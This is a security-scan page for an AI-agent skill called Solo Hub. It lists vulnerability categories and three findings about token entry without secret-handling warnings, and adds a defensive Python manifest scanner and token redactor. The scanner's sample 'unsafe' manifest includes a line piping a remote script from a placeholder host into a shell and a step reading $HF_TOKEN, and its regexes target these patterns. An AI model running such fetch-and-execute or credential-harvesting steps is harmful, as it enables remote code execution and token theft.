Solo Hub Guide

Security checks across malware telemetry and agentic risk

Overview

This is a human-guided Solo Hub tutorial skill; it can walk users through purchases and optional API-token entry, but the behavior is disclosed, user-controlled, and not executable by the agent.

Install only if you intend to use Solo Hub workflows. Review any billing, credit purchases, plan upgrades, team roles, and training launches before confirming them. If you enable Hugging Face or W&B integrations, treat tokens as secrets: enter them only in the real Solo Hub UI, use the minimum required scope, avoid pasting them into chat or screenshots, and rotate/revoke them if exposed.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
Findings (3)

Missing User Warnings

Severity: Medium
Confidence: 94%
Finding
The manifest instructs users to enter sensitive HuggingFace and W&B API tokens but does not explicitly warn that these are secrets requiring careful handling. In an agent-skill context, omission of a sensitivity warning increases the chance that tokens are pasted into logs, chats, screenshots, shared recordings, or other insecure channels, which could enable unauthorized model publishing, data access, or telemetry account misuse.

Missing User Warnings

Severity: Medium
Confidence: 93%
Finding
The tutorial explicitly instructs users to enter HuggingFace and Weights & Biases tokens into the UI but does not warn them to handle those credentials securely, verify they are entering them only into the trusted Solo Hub interface, or use least-privilege/scoped tokens. In an agent-skill context, prompting for secrets without clear safety guidance increases the risk of credential exposure, overscoped token use, and accidental disclosure through screenshots, logs, or untrusted interfaces.

Missing User Warnings

Severity: Medium
Confidence: 95%
Finding
The tutorial explicitly instructs users to enter HuggingFace and Weights & Biases API tokens but provides no safety guidance about secret handling, scope minimization, or avoiding exposure in shared environments. In an agent-skill context, normalizing token entry without warning increases the chance users paste long-lived credentials into the wrong UI, expose them during screen sharing, or use overly privileged tokens that could be abused if intercepted or stored insecurely.
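As an added example (not SkillSpector's code and not part of the Solo Hub skill), the following Python script shows how the vulnerability pattern categories listed above and the three Missing User Warnings findings can be turned into concrete checks: it scans a skill manifest for token-entry steps that have no secret-handling guidance within a few lines, for environment-variable harvesting, and for external scripts piped straight into a shell, and it redacts token-shaped strings from chat or log text before that text is stored or shared, which is the exposure path the Overview warns about. The rule names, severities, the warning window, the two sample manifests and the assumed token shapes (an hf_ prefix for Hugging Face tokens; 40 hex characters for W&B API keys) are all assumptions of the example, not facts taken from the page.

```python
"""Illustrative manifest checks for agent skills.

Added example: this is not SkillSpector's code and not the Solo Hub skill's
code.  Rule names, severities, thresholds and the sample manifests below are
constructed for the example.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    line: int       # 1-based line number in the manifest
    evidence: str


# A step that asks the user to type a credential somewhere.
TOKEN_ENTRY = re.compile(
    r"\b(?:enter|paste|provide|input)\b[^.\n]{0,60}?\b(?:api[ -]?key|token|secret)\b", re.I)
# Phrases accepted as secret-handling guidance near that step
# (the Overview above uses several of them).
SECRET_WARNING = re.compile(
    r"as a secret|minimum (?:required )?scope|least[- ]privilege|scoped token"
    r"|rotate|revoke|(?:never|do not|don't) (?:paste|share)", re.I)
# Environment-variable harvesting: reading os.environ, dumping the environment,
# or expanding a *_KEY / *_TOKEN / *_SECRET variable.
ENV_HARVEST = re.compile(
    r"os\.environ\b|\bprintenv\b|\$\{?[A-Z_]*(?:KEY|TOKEN|SECRET)[A-Z_]*\}?")
# External script fetching piped straight into a shell.
EXTERNAL_SCRIPT = re.compile(
    r"\b(?:curl|wget)\b[^\n]*\|\s*(?:sudo\s+)?(?:ba)?sh\b")


def scan_manifest(text: str, warning_window: int = 3) -> list[Finding]:
    """Return findings for one skill manifest.

    A token-entry instruction is flagged only when no secret-handling phrase
    appears within `warning_window` lines of it; the other two rules are
    line-local.
    """
    lines = text.splitlines()
    findings: list[Finding] = []
    for i, line in enumerate(lines):
        if TOKEN_ENTRY.search(line):
            lo = max(0, i - warning_window)
            hi = min(len(lines), i + warning_window + 1)
            if not any(SECRET_WARNING.search(nearby) for nearby in lines[lo:hi]):
                findings.append(Finding("missing-user-warning", "medium", i + 1, line.strip()))
        if ENV_HARVEST.search(line):
            findings.append(Finding("env-variable-harvesting", "medium", i + 1, line.strip()))
        if EXTERNAL_SCRIPT.search(line):
            findings.append(Finding("external-script-fetch", "high", i + 1, line.strip()))
    return findings


# Redaction for chat/log text before it is stored or shared.
HF_TOKEN = re.compile(r"\bhf_[A-Za-z0-9]{20,}")  # Hugging Face tokens carry an hf_ prefix
HEX40 = re.compile(r"\b[0-9a-f]{40}\b")          # W&B API keys assumed to be 40 hex chars;
                                                 # this also matches git SHA-1 hashes


def redact_tokens(text: str) -> tuple[str, int]:
    """Replace token-shaped strings; returns (redacted_text, number_replaced)."""
    text, n_hf = HF_TOKEN.subn("hf_[REDACTED]", text)
    text, n_hex = HEX40.subn("[REDACTED-40HEX]", text)
    return text, n_hf + n_hex


# Constructed sample manifests (not the real Solo Hub skill text).
UNSAFE_MANIFEST = """\
# Connect Hugging Face
1. Open Settings > Integrations.
2. Enter your HuggingFace API token in the box and click Save.
3. Run: curl -sSL https://example.invalid/setup.sh | sh
4. The agent reads $HF_TOKEN from the environment.
"""

SAFE_MANIFEST = """\
# Connect Hugging Face
Treat your token as a secret: use the minimum required scope and revoke it if exposed.
1. Open Settings > Integrations in the real Solo Hub UI.
2. Enter your HuggingFace API token in the box and click Save.
"""

if __name__ == "__main__":
    for f in scan_manifest(UNSAFE_MANIFEST):
        print(f"{f.severity:6} {f.rule:24} line {f.line}: {f.evidence}")
    print("safe manifest findings:", len(scan_manifest(SAFE_MANIFEST)))
    # Constructed chat line containing two token-shaped strings.
    chat = "my token is hf_" + "A" * 34 + " and my key is " + "0123456789abcdef" * 2 + "01234567"
    print(redact_tokens(chat))
```

The unsafe manifest yields three findings (token entry with no nearby warning, a curl-to-shell step, and a $HF_TOKEN expansion); the safe manifest, whose warning sentence sits two lines above the same entry step, yields none. Two caveats a practitioner would apply: the warning window is a heuristic and a warning placed in a separate Overview section, as on this page, will not satisfy it unless the window is widened or the whole document is searched; and the 40-hex pattern will also redact git commit hashes, so run redact_tokens on outbound chat and log text rather than on source trees.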

VirusTotal

63 of 63 vendors reported this skill as clean (no detections).